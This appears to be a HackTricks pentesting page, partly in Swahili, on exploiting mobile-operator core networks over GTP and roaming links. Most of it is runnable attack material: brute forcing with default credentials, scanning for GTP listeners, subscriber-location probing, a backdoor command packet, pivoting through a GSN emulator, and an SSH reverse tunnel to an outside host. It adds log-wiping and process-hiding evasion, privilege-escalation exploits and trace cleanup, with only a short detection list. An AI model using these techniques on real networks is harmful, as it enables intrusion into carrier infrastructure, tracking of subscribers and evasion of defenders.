# Telecom Network Exploitation (GTP / Roaming Environments)

{{#include ../../banners/hacktricks-training.md}}

> [!NOTE]
> Protokali za msingi za simu (GPRS Tunnelling Protocol – GTP) mara nyingi hupita kwenye mifumo ya GRX/IPX ya kuhamahama ambayo inaaminika kwa kiasi fulani.  Kwa sababu zinatumia UDP bila uthibitisho wowote, **mara nyingi mguu wowote ndani ya mipaka ya telecom unaweza kufikia moja kwa moja ndege za ishara za msingi**.  Maelezo yafuatayo yanakusanya mbinu za mashambulizi zilizoshuhudiwa katika mazingira halisi dhidi ya SGSN/GGSN, PGW/SGW na nodi nyingine za EPC.

## 1. Recon & Initial Access

### 1.1  Default OSS / NE Accounts
Seti kubwa ya ajabu ya vipengele vya mtandao wa wauzaji huja na watumiaji wa SSH/Telnet waliowekwa kwa nguvu kama `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  Orodha ya maneno iliyotengwa huongeza kwa kiasi kikubwa mafanikio ya brute-force:
```bash
hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
```
Ikiwa kifaa kinatoa tu VRF ya usimamizi, pitisha kupitia mwenyeji wa jump kwanza (tazama sehemu «SGSN Emu Tunnel» hapa chini).

### 1.2  Ugunduzi wa Mwenyeji ndani ya GRX/IPX
Watoa huduma wengi wa GRX bado wanaruhusu **ICMP echo** kupitia msingi. Changanya `masscan` na uchunguzi wa `gtpv1` UDP uliojengwa ndani ili haraka kuchora wasikilizaji wa GTP-C:
```bash
masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
```
## 2. Kuorodhesha Wajibu – `cordscan`

Zana hii ya Go inatengeneza **GTP-C Create PDP Context Request** pakiti na kurekodi majibu. Kila jibu linafunua **SGSN / MME** inayohudumia IMSI iliyoulizwa na, wakati mwingine, PLMN iliyotembelewa na mteja.
```bash
# Build
GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan

# Usage (typical):
./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
```
Key flags:
- `--imsi` Lengo la mteja IMSI
- `--oper` Nyumbani / HNI (MCC+MNC)
- `-w`      Andika pakiti za raw kwenye pcap

Misingi muhimu ndani ya binary inaweza kubadilishwa ili kupanua skana:
```
pingtimeout       = 3   // seconds before giving up
pco               = 0x218080
common_tcp_ports  = "22,23,80,443,8080"
```
## 3. Utekelezaji wa Kanuni kupitia GTP – `GTPDoor`

`GTPDoor` ni huduma ndogo ya ELF ambayo **inafungua UDP 2123 na kuchambua kila pakiti ya GTP-C inayokuja**. Wakati mzigo unapoanza na lebo iliyoshirikiwa awali, yaliyobaki yanachambuliwa (AES-128-CBC) na kutekelezwa kupitia `/bin/sh -c`. Stdout/stderr zinahamishwa ndani ya **Echo Response** ujumbe ili kwamba hakuna kikao chochote cha nje kinachoundwa.

Pakiti ya PoC ya chini (Python):
```python
import gtpc, Crypto.Cipher.AES as AES
key = b"SixteenByteKey!"
cmd = b"id;uname -a"
enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
```
Detection:
* mwenyeji yeyote anayepeleka **Maombi ya Echo yasiyo sawa** kwa IP za SGSN
* Bendera ya toleo la GTP imewekwa kuwa 1 wakati aina ya ujumbe = 1 (Echo) – mabadiliko kutoka kwa spesifiki

## 4. Pivoting Through the Core

### 4.1  `sgsnemu` + SOCKS5
`OsmoGGSN` inatoa emulators ya SGSN inayoweza **kuanzisha muktadha wa PDP kuelekea GGSN/PGW halisi**. Mara baada ya kujadiliwa, Linux inapokea kiunganishi kipya cha `tun0` kinachoweza kufikiwa kutoka kwa mwenzi wa roaming.
```bash
sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
-APN internet -c 1 -d
ip route add 172.16.0.0/12 dev tun0
microsocks -p 1080 &   # internal SOCKS proxy
```
Kwa matumizi sahihi ya firewall hair-pinning, handaki hii inapita VLANs za ishara pekee na inakufikisha moja kwa moja kwenye **data plane**.

### 4.2  SSH Reverse Tunnel juu ya Port 53
DNS karibu kila wakati iko wazi katika miundombinu ya kuhamahama.  Funua huduma ya ndani ya SSH kwa VPS yako inayosikiliza kwenye :53 na urudi baadaye kutoka nyumbani:
```bash
ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
```
Check that `GatewayPorts yes` is enabled on the VPS.

## 5. Covert Channels

| Channel | Transport | Decoding | Notes |
|---------|-----------|----------|-------|
| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | msikivu safi, hakuna trafiki ya nje |
| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | inatazama `*.nodep` sub-domain |
| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | inachanganyika na mazungumzo halali ya GTP-C |

All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.

## 6. Defense Evasion Cheatsheet
```bash
# Remove attacker IPs from wtmp
utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp

# Disable bash history
export HISTFILE=/dev/null

# Masquerade as kernel thread
echo 0 > /proc/$$/autogroup   # hide from top/htop
printf '\0' > /proc/$$/comm    # appears as [kworker/1]

touch -r /usr/bin/time /usr/bin/chargen   # timestomp
setenforce 0                              # disable SELinux
```
## 7. Kuinua Haki kwenye NE za Kizamani
```bash
# DirtyCow – CVE-2016-5195
gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd

# PwnKit – CVE-2021-4034
python3 PwnKit.py

# Sudo Baron Samedit – CVE-2021-3156
python3 exploit_userspec.py
```
Usafi wa mazingira:
```bash
userdel firefart 2>/dev/null
rm -f /tmp/sh ; history -c
```
## 8. Tool Box

* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – zana za kawaida zilizoelezwa katika sehemu za awali.
* `FScan` : skanning ya TCP ya intranet (`fscan -p 22,80,443 10.0.0.0/24`)
* `Responder` : LLMNR/NBT-NS rogue WPAD
* `Microsocks` + `ProxyChains` : pivoting nyepesi wa SOCKS5
* `FRP` (≥0.37) : NAT traversal / bridging ya mali

---
## Detection Ideas
1. **Kila kifaa kingine isipokuwa SGSN/GGSN kinachounda Maombi ya Kuunda Muktadha wa PDP**.
2. **Bandari zisizo za kawaida (53, 80, 443) zinapokea mikono ya SSH** kutoka kwa IP za ndani.
3. **Maombi ya Echo mara kwa mara bila Majibu ya Echo yanayolingana** – yanaweza kuashiria beacon za GTPDoor.
4. **Kiwango cha juu cha trafiki ya ICMP echo-reply yenye viwanja vikubwa, visivyo na sifuri vya kitambulisho/mfuatano**.

## References

- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
- 3GPP TS 29.281 – GTPv2-C (v17.6.0)

{{#include ../../banners/hacktricks-training.md}}